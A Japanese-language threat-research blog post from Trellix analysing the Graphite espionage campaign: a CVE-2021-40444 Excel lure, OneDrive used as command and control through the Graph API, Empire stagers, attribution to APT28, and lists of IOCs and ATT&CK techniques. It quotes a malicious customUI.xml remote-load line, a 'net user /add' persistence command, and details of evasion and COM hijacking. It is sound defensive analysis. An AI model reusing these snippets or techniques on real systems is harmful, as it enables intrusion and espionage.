Trellix logo
Trellix Introduction Video
Trellix Introduction

A living security platform with a pulse that is always learning and always adapting.

Gartner Magic Quadrant for Endpoint Protection Platforms
Gartner MQ (Endpoint)

Download the Magic Quadrant report, which evaluates the 19 vendors based on ability to execute and completeness of vision.

Gartner Marketplace Guide (XDR)
Gartner® Report: Market Guide for XDR

As per Gartner, "XDR is an emerging technology that can offer improved threat prevention, detection and response."

Critical Flaws in Widely Used Building Access Control System
Critical Flaws in Widely Used Building Access Control System

At Hardwear.io 2022, Trellix researchers disclosed 8 zero-day vulnerabilities in HID Global Mercury access control panels, allowing them to remotely unlock and lock doors, modify and configure user accounts and subvert detection from management software.

Trellix Threat Labs Research Report: April 2022
Trellix Threat Labs Research Report: April 2022

Our report on the rise of cyberattacks in the fourth quarter and Ukraine in the start of the new year.

Trellix CEO
Our CEO on Living Security

Trellix CEO, Bryan Palma, explains the critical need for security that’s always learning.

Trellix Introduction Video
Trellix Introduction

A living security platform with a pulse that is always learning and always adapting.

Stories

The latest cybersecurity trends, best practices,
security vulnerabilities, and more

スパイ活動による情報漏洩の詳細:政府高官がターゲットに

概要

当社の高度な脅威研究チームは、西アジア地域の防衛産業における国家安全保障政策と個人を監督する政府高官を対象とした多段階スパイ活動を特定しました。この攻撃の技術的な要素を詳しく説明するにあたり、被害者にリリース前の開示を行い、既知の攻撃コンポーネントをすべて環境から削除するために必要なすべてのコンテンツを提供したことを確認しています。

おそらく、この感染チェーンはeメールで被害者に送られたExcelダウンローダーの実行から始まり、MSHTMLリモートコード実行の脆弱性(CVE-2021-40444)を悪用して、メモリ内で悪意のある実行ファイルを展開したと思われます。MicrosoftのGraph APIを使用してOneDriveをコマンド&コントロールサーバーとして活用するため、Graphiteと呼ばれるフォローアップ型のマルウェアを使用します。これは、当社のチームがこれまでに確認したことのない手法です。さらに、可能な限り攻撃を隠蔽するために複数のステージに分割されています。

コマンド&コントロール機能には、2021年7月に準備されたEmpireサーバーが使用されました。実際のキャンペーンは2021年10月から11月にかけて実行されました。この記事では、攻撃の内部構造、被害者像、インフラ、時系列について解説し、IOCやMITRE ATT&CKの技法も明らかにします。

多くの攻撃指標と地政学的に明白な点が、過去に露見したされた脅威アクターAPT28と類似しています。証拠だけに基づいて同類のキャンペーンであるということはできませんが、私たちの推測がある程度は正しいと確信しています。インフラ、マルウェアのコーディング、操作のセットアップ方法から、非常に熟練した攻撃者を相手にしていることは間違いありません。

Trellixのお客様は、これらの指標とともに提供されたMcAfee EnterpriseとFireEyeの製品により保護されています。

攻撃プロセスの分析

ここでは、MSHTMLリモートコード実行の脆弱性(CVE-2021-40444)を悪用したExcelファイルの実行から始まる、攻撃の全体的なプロセスを分析します。第3段階のマルウェアのダウンローダーとして動作する悪意のあるDLLファイルを実行するためにGraphiteと呼ばれているものが使用されます。GraphiteはOneDrive Empire Stagerをベースにした、新しく発見されたマルウェアのサンプルで、Microsoft Graph APIを介してコマンド&コントロールサーバーとしてOneDriveアカウントを悪用するものです。

APTのオペレーションに関連すると考えられる多段階攻撃の最終段階において、被害者のコンピュータ上でEmpireエージェントをダウンロードし、コマンド&コントロールサーバーを使用してシステムをリモート制御するため、さまざまなEmpire stagerを実行します。

次の図は、この攻撃のプロセス全体を示したものです。

図1. 攻撃の流れ

第1段階 – Excelダウンローダー

この攻撃の最初の段階では、スピアフィッシングメールを使い「parliament_rew.xlsx」という名前のExcelファイルを開かせるよう、被害者を誘い込むようです。以下に、このファイルの識別情報を示します。

File type Excel Microsoft Office Open XML Format document
File name parliament_rew.xlsx
File size 19.26 KB
Compilation time 05/10/2021
MD5 8e2f8c95b1919651fcac7293cb704c1c
SHA-256 f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4

図2. Excelファイルで観測されたDecoy text

このファイルの構造を分析したところ、「customUI」という名前のフォルダがあり、その中に「customUI.xml」という名前のファイルが含まれていることが確認されました。このファイルをテキストエディタで開くと、悪意のある文書がOpenXML形式の「CustomUI.OnLoad」プロパティを使用、リモートサーバーから外部ファイルを読み込んでいることが確認されました。

<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>

この技法により、攻撃者は一部のアンチウイルススキャンエンジンやオフィス分析ツールを回避することができ、文書が検出される可能性を低くすることができます。

ダウンロードされたファイルは再びExcelのスプレッドシートですが、今回は古いMicrosoft Office Excel 97-2003 Binary File Format (.xls)を使用して保存されています。以下に、このファイルの識別情報を示します。:

File type Microsoft Office Excel 97-2003 Binary File Format
File name parliament_rew.xls
File size 20.00 KB
Compilation time 05/10/2021
MD5 abd182f7f7b36e9a1ea9ac210d1899df
SHA-256 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a

メタデータオブジェクトの分析から、作成者は西欧諸国で使用されているコードページ1252を使用、2021年10月5日にファイルを作成したことが確認できます。

図3. ドキュメントのメタデータ

その後、文書内のOLEオブジェクトを解析したところ、攻撃者のサーバーにホストされている脆弱性CVE-2021-40444のエクスプロイトへのリンクを含むLinked Object OLEStream Structureを発見しました。これにより、ドキュメントが自動的にHTMLファイルをダウンロードした後、Internet Explorerのエンジンを呼び出して解釈し、エクスプロイトの実行をトリガーすることができます。

図4. OLEオブジェクトのリモートリンク

CVE-2021-40444の脆弱性については、すでに公に説明され議論されているため、この記事では内部の検証はせずに、エクスプロイトのCABファイルに含まれる第2段階のDLLについて分析を続けます。

第2段階 – DLLダウンローダー

第2段階は、先ほどのエクスプロイトで使用したCABファイルから抽出されたfontsubc.dllというDLL実行ファイルです。このファイルの識別情報は以下から確認できます。:

File type PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
File name fontsubc.dll
File size 88.50 KB
Compilation time 28/09/2021
MD5 81de02d6e6fca8e16f2914ebd2176b78
SHA-256 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40

このファイルは、Windowsがコントロールパネルアプリケーションとして認識する「CPlApplet」という関数をエクスポートします。これは主に、COMオブジェクトとAPI「URLOpenBlockingStreamW」を使用してhxxps://wordkeyvpload[.]net/keys/update[.]datにある次の段階のマルウェアに対するダウンローダーとして機能します。

図5. 次段階のマルウェアのダウンロード

ダウンロード後、マルウェアは埋め込まれたRSA公開鍵でファイルを復号し、復号されたペイロードのSHA-256を計算してその整合性をチェックします。最後に、マルウェアは仮想メモリを確保し、そこにペイロードをコピーして実行します。

図6. ペイロードの復号化と実行

ダウンロードしたペイロードを実行する前に、マルウェアは最初の4バイトを16進数でマジックバリューDE 47 AC 45と比較し、異なる場合はペイロードを実行しません。

図7. マルウェアのマジックバリュー

第3段階 – グラファイトマルウェア

第3段階は、前段階のメモリから抽出できたdfsvc.dllという名前の、ディスクに書き込まれることのないDLL実行ファイルである。以下に、このファイルの識別情報を示します。:

File type PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
File name dfsvc.dll
File size 24.00 KB
Compilation time 20/09/2021
MD5 0ff09c344fc672880fdb03d429c7bda4
SHA-256 f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231

Microsoft Graph APIを使用してOneDriveをコマンド&コントロールとして使用することから、このマルウェアをGraphiteと名付けました。Graphiteの開発者は、アクターのOneDriveアカウントで使用されている機能とファイル構造が類似していることから、Empire OneDrive Stagerを参考にした可能性が非常に高いと思われます。

図 8. Empire OneDrive StagerのAPIリクエスト

Graphiteはまず、二重実行を避けるためにハードコードされた名前「250gHJAWUI289382s3h3Uasuh289di」でミューテックスを作成し、文字列を復号化して、後で使用するAPIを動的に解決することから開始します。さらに、感染したコンピュータを識別するために、レジストリキー「HKEY_LOCAL_MACHINE」「SOFTWARE」「Microsoft Cryptography」「CachineGuid」に格納された値のCRC32チェックサムであるボット識別子を計算します。

図9. Graphiteの初期化

次に、マルウェアはタスクの実行を監視するスレッドを作成し、その結果をOneDriveのアカウントにアップロードします。結果ファイルは、攻撃者のOneDriveアカウントの「update」フォルダにアップロードされます。

図10. タスクの結果を監視するスレッド

その後、マルウェアは無限ループに入り、20分ごとにMicrosoft Graph APIリクエストで使用する新しいOAuth2トークンを取得し、攻撃者のOneDriveアカウントの「check」フォルダに実行する新しいタスクがあるかどうかを判断します。

図11. 新しいOAuth2トークンのリクエスト

有効なOAuth2トークンを取得すると、被害者のシステムから以下の情報を含む偵察データを収集します:

  • Running processes
  • .NET CLR version from PowerShell
  • Windows OS version

データはLZNT1アルゴリズムで圧縮され、ランダムなIVとともにハードコードされたAES-256-CBCキーで暗号化される。オペレータのタスクも同様に暗号化されます。最後に、システム情報を含むファイルをOneDriveの「{BOT_ID}/update」フォルダにランダムな名前でアップロードします。

図12 システム情報を格納したファイル データをエンコードするGraphite

また、Graphiteは “check “サブディレクトリ内の子ファイルを列挙して、新しいコマンドの有無を問い合わせる。新しいファイルが見つかった場合、Graph APIを使用してファイルの内容をダウンロードし、復号化する。復号化されたタスクは2つのフィールドを持ちます。最初のフィールドはタスクのユニークな識別子で、2番目のフィールドは実行するコマンドを指定します。

コマンド値「1」は、マルウェアがシステム情報を再びコマンド&コントロール(攻撃者のOneDrive)に送信するよう指示します。コマンド値「2」は、復号化されたタスクがシェルコードであることを示し、マルウェアはそれを実行するスレッドを作成することになります。

図13. Graphiteのコマンド

受信したタスクがシェルコードの場合、3番目のフィールドを16進数でDE 47 AC 45というマジックバリューで確認し、異なる場合はペイロードを実行しない。タスクの残りのバイトが実行されるシェルコードである。最後に、タスクのファイルは処理後、OneDriveから削除されます。

図 14. 復号化されたオペレータタスク

下の図は、Graphiteマルウェアのフローをまとめたものです。

図15 グラファイト Graphiteの実行図

第4段階 – Empire DLL Launcher Stager

第4段階は、前ステージのタスクから抽出できたcsiresources.dllというダイナミック・ライブラリ・ファイルです。このファイルは、プロセスのメモリに実行ファイルを反射的にロードして実行するために使用されるGraphiteシェルコード・タスクに埋め込まれていました。以下に、このファイルの識別情報を示します。

File type PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
File name csiresources.dll
File size 111.00 KB
Compilation time 21/09/2021
MD5 138122869fb47e3c1a0dfe66d4736f9b
SHA-256 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9

サンプルは、Empireエージェントをステージングするためのダウンロードクレードルを実行するために、アンマネージドプロセスに.NET CLR Runtimeを初期化し起動する、Empire DLL Launcher stagerを生成したものです。それを使えば、PowerShell.exeではないプロセスでEmpireエージェントを実行することが可能です。

まず、マルウェアはexplorer.exeのプロセスから実行されているかどうかをチェックします。そうでない場合、マルウェアは終了します。

図16. プロセス名チェック

次に、マルウェアはSystem32フォルダ内にある「EhStorShell.dll」というファイルを探し出し、読み込もうとします。これにより、マルウェアは元の「EhStorShell.dll」ファイルがexplorer.exeのコンテキストにロードされることを確認します。

図17. EhStorShell.dllライブラリのロード

後続のマルウェアは、CLSID「{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}」を上書きし、被害者のシステム内で永続性を獲得し、COMハイジャック技術を実行するため、前述の操作は重要なものとなっています。前述のCLSIDは「Enhanced Storage Shell Extension DLL」に相当し、「EhStorShell.dll」というファイルによって処理されます。

次に、マルウェアは.NET CLR Runtimeをロード、初期化、起動し、.NET next stageペイロードをXOR復号してメモリにロードします。最後に、マルウェアは.NET Runtimeを使用してファイルを実行します。

図18. ネクストステージマルウェアの復号化

第5段階 – Empire PowerShell C# Stager

第5段階は、前ステージで埋め込まれ暗号化されたService.exeという名前の.NET実行ファイルです。以下に、このファイルの識別情報を示します。

File type PE32 executable for MS Windows (console) Intel 80386 32-bit
File size 34.00 KB
MD5 3b27fe7b346e3dabd08e618c9674e007
SHA-256 d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317

このサンプルは、PowerShellオブジェクトのインスタンスを作成し、埋め込まれたPowerShellスクリプトをXOR演算で復号化し、Base64でデコードしてから最終的にInvoke関数でペイロードを実行することが主目的のEmpire PowerShell C# Stagerです。

図19 第5段階のコード

PowerShellのコードをロードして実行するために.NETの実行ファイルを使用する背景には、AMSIのようなセキュリティ対策を回避し、本来許されないプロセスからの実行を可能にするという理由があります。

第6段階 – Empire HTTP PowerShell Stager

最後のステージは PowerShell スクリプト、特に前のステージで埋め込まれ、暗号化されたエンパイア HTTP Stager です。以下、ファイルの識別情報を確認できます。

File type Powershell script
File size 6.00 KB
MD5 a81fab5cf0c2a1c66e50184c38283e0e
SHA-256 da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37

先に述べたように、これは多段階攻撃の最後の段階であり、分析を困難にするために、Empireの Invoke-難読化スクリプトを使用して非常に難読化されたHTTPステージです。

図20. 難読化されたPowerShellスクリプト

スクリプトの主な機能は、hxxp://wordkeyvpload[.]org/index[.]jspに連絡してシステムの初期情報を送り、URL hxxp://wordkeyvpload[.]org/index[.]php に接続し暗号化したEmpireエージェントをダウンロードしてAES-256で復号して実行することです。

イベントのタイムライン

監視・分析されたすべての活動に基づいて、以下の時系列で事象を説明します。

図 21. キャンペーンのタイムライン

ターゲティング

以前紹介したルアードキュメントの1つ(「parliament_rew.xlsx」と命名)は、政府職員をターゲットにしたものかもしれません。

この敵は、政府機関をターゲットとする以外に、防衛産業にも狙いを定めているようです。Missions Budget.xlsx」という名前の別の文書には、「Military and civilian missions and operations」という文章と、2022年と2023年のいくつかの国における軍事作戦の予算がドル建てで記載されていました。

図22. 防衛分野を狙ったルアードキュメント

さらに、テレメトリにより、ポーランドや他の東欧諸国がこのキャンペーンの背後にあるサイバー犯罪者の関心事であることも確認されました。

この犯罪者の被害者の全体像は不明ですが、我々が見たルアードキュメントでは、その活動が特定の地域や産業を中心としていることがわかる。悪意のあるExcelファイルの名前、内容、私たちのテレメトリによると、犯罪者は東欧の国々をターゲットにしており、最も普及している産業は防衛と政府であると思われます。

インフラストラクチャ

攻撃チェーン全体の分析により、この攻撃に関連する2つのホストが特定されました。最初のドメインはwordkeyvpload.netで、セルビアに位置し、2021年7月7日にOwnRegistrar Inc.に登録されたIP 131.153.96.114に解決されます。

DNS逆引きツールでIPを照会すると、PTRレコードがドメイン「bwh7196.bitcoinwebhosting.net」に解決され、これはサーバーがBitcoin Web Hosting VPS再販会社から購入されたことを示す可能性があります。

図 23. リバースDNSクエリ

このコマンド&コントロールサーバーの主な機能は、CVE-2021-40444に対するHTMLエクスプロイトと、第2段階のDLLを含むCABファイルをホストすることです。.

2番目に確認されたドメインはwordkeyvpload.orgで、IP 185.117.88.19に解決され、スウェーデンに位置し、Namecheap Inc.で2021年6月18日に登録されました。オペレーティングシステム(Microsoft Windows Server 2008 R2)、HTTPサーバー(Microsoft-IIS/7.5)、およびオープンポート(1337および5000)に基づいて、このホストがEmpireポストエクスプロイトフレームワークの最新バージョンを実行している可能性が非常に高いです。

その仮説の背後にある理由は、Empireサーバーのデフォルト構成は、RESTful APIをホストするためにポート1337を使用し、ポート5000はサーバーとリモートで対話するためのSocketIOインターフェイスをホストしていることです。また、HTTP Listenerをデプロイする場合、HTTP Serverフィールドのデフォルト値は「Microsoft-IIS/7.5」にハードコードされています。

図 24. デフォルト設定でのLocal Empireサーバーの実行

前述の情報と、マルウェアの最終段階からコマンドとコントロールを抽出した結果、このホストは、被害者のマシンにインストールされたエージェントをリモートで制御し、実行するためのコマンドを送信するために使用するEmpireサーバーとして動作することが確認できます。

属性

この作戦の期間中、アルメニアとアゼルバイジャンの国境付近では、政治的な緊張が続いていた。したがって、古典的な諜報活動の観点からすれば、潜入して情報を収集し、さまざまな関係者のリスクと動きを評価することは、完全に理にかなっていると言えます。

Graphiteキャンペーンの調査を通じて、攻撃者の活動のすべてのタイムスタンプをテレメトリから抽出したところ、2つの一貫した傾向があることがわかりました。まず、以下の画像に描かれているように、敵の活動日は月曜日から金曜日までです。

図25. 敵の活動日

次に、アクティビティのタイムスタンプは、モスクワ時間、トルコ時間、アラビア標準時、東アフリカ時間を含むGMT+3タイムゾーンにおける通常の営業時間(8時から18時まで)に対応していることです。.

図26. 敵の作業時間

調査中のもう一つの興味深い発見は、攻撃者がCLSID(D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D)を持続性のために使用していたことであり、研究者が東ヨーロッパ諸国を標的としたロシア作戦に言及したESETのレポートと一致しました。

グラファイトマルウェアのコードブロックと配列を当社のサンプルデータベースと分析・比較したところ、2018年にAPT28に起因するサンプルと重複していることがわかりました。例えば、私たちのサンプルをこのサンプルに向けて比較しました。5bb9f53636efafdd30023d44be1be55bf7c7b7d5 (sha1):

図27 サンプルのコード比較

一部の機能を拡大すると、下図の左側がグラファイトのサンプル、右側が前述の2018年のサンプルであることが観察されます。3年近い時差があるので、コードが変わっているのも納得ですが、それでもプログラマーは以前の関数で満足しているようです。

図28 似たような機能の流れ

このキャンペーンの背後にいる攻撃者の戦術、技術、手順(TTP)をいくつか挙げましたが、国民国家のスポンサーはもちろん、APT28に対して低/中程度の信頼度で指し示すだけの文脈、類似性、重複がないだけなのです。しかし、私たちは、インフラストラクチャ、マルウェアのコード化、および操作のセットアップ方法に基づいて、熟練した攻撃者を相手にしていると考えています。

結論

このブ記事で紹介したキャンペーンの分析により、10月初旬に行われたMSHTMLリモートコード実行脆弱性(CVE-2021-40444)を利用した東欧諸国を標的とした多段階の攻撃に関する洞察を得ることができました。

Graphiteマルウェアの分析に見られるように、かなり革新的に機能しており、マルウェアにハードコードされたトークンを使ってMicrosoft Graph APIにクエリを送信し、OneDriveサービスをコマンド&コントロールとして使用しています。このような通信を行うことで、マルウェアは正規のMicrosoftドメインにのみ接続し、疑わしいネットワークトラフィックを表示しないため、被害者のシステムで気づかれることはありません。

攻撃プロセス全体の分析により、攻撃者からのコマンド&コントロールとして機能する新しいインフラストラクチャと、ポストエクスプロイトフレームワークEmpireのエージェントである最終ペイロードを特定することが出来ました。以上のことから、このキャンペーンで観察されたアクティブの時系列を構築することができました。

この攻撃の背後にいる犯罪者は、標的、マルウェア、およびオペレーションに使用されるインフラストラクチャから、非常に高度であることがわかり、このキャンペーンの主な目標はスパイ活動であると推測されます。信頼度が低く、中程度であることから、この作戦はAPT28によって実行されたと考えています。今後の調査に役立つ、キャンペーンを検出するためのTTP(tactics, techniques and procedures)、インフラに関する指標、標的、能力を手に入れました。

MITRE ATT&CK Techniques

Tactic
Resource Development T1583.001 Acquire Infrastructure: Domains Attackers purchased domains to be used as a command and control. wordkeyvpload[.]net
wordkeyvpload[.]org
Resource Development T1587.001 Develop capabilities: Malware Attackers built malicious components to conduct their attack. Graphite malware
Resource Development T1588.002 Develop capabilities: Tool Attackers employed red teaming tools to conduct their attack. Empire
Initial Access T1566.001 Phishing: Spear phishing Attachment Adversaries sent spear phishing emails with a malicious attachment to gain access to victim systems. BM-D(2021)0247.xlsx
Execution T1203 Exploitation for Client Execution Adversaries exploited a vulnerability in Microsoft Office to execute code. CVE-2021-40444
Execution T1059.001 Command and Scripting Interpreter: PowerShell Adversaries abused PowerShell for execution of the Empire stager. Empire Powershell stager
Persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking Adversaries established persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. CLSID: D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D
Persistence T1136.001 Create Account: Local Account Adversaries created a local account to maintain access to victim systems. net user /add user1
Defense Evasion T1620 Reflective Code Loading Adversaries reflectively loaded code into a process to conceal the execution of malicious payloads. Empire DLL Launcher stager
Command and Control T1104 Multi-Stage Channels Adversaries created multiple stages to obfuscate the command-and-control channel and to make detection more difficult. Use of different Empire stagers
Command and Control T1102.002 Web Service: Bidirectional Communication Adversaries used an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Microsoft OneDrive
Empire Server
Command and Control T1573.001 Encrypted Channel: Symmetric Cryptography Adversaries employed a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. AES 256
Command and Control T1573.002 Encrypted Channel: Asymmetric Cryptography Adversaries employed a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. RSA

Indicators of Compromise (IOCs)

First stage – Excel Downloaders
40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa
f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4
7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a
9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0

Second stage – Downloader DLL
1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40

Third stage – Graphite
35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f
f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231

Fourth stage – DLL Launcher Stager
25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9

Fifth stage – PowerShell C# Stager
d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317

Sixth stage – Empire HTTP Powershell Stager
da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37

URLs
hxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls
hxxps://wordkeyvpload[.]net/keys/parliament_rew.xls
hxxps://wordkeyvpload[.]net/keys/Missions Budget.xls
hxxps://wordkeyvpload[.]net/keys/TR_comparison.xls

hxxps://wordkeyvpload[.]net/keys/JjnJq3.html
hxxps://wordkeyvpload[.]net/keys/iz7hfD.html
hxxps://wordkeyvpload[.]net/keys/Ari2Rc.html
hxxps://wordkeyvpload[.]net/keys/OD4cNq.html

hxxps://wordkeyvpload[.]net/keys/0YOL4.cab
hxxps://wordkeyvpload[.]net/keys/whmel.cab
hxxps://wordkeyvpload[.]net/keys/UdOpQ.cab
hxxps://wordkeyvpload[.]net/keys/D9V5E.cab

hxxps://wordkeyvpload[.]net/keys/update.dat

hxxps://wordkeyvpload[.]org/index.jsp
hxxps://wordkeyvpload[.]org/index.php
hxxps://wordkeyvpload[.]org/news.php
hxxps://wordkeyvpload[.]org/admin/get.php
hxxps://wordkeyvpload[.]org/login/process.php

ドメイン
wordkeyvpload[.]net
wordkeyvpload[.]org
jimbeam[.]live

IPs
131.153.96[.]114
185.117.88[.]19
94.140.112[.]178

最新情報を入手する

サイバー セキュリティは私たちの得意とするところです。とはいえ、私たちは新しい会社です。
これから進化してまいりますので、最新情報をお見逃しなきよう、お願いいたします。

有効な電子メール アドレスを入力してください。
迷惑メールゼロ。配信はいつでも停止できます。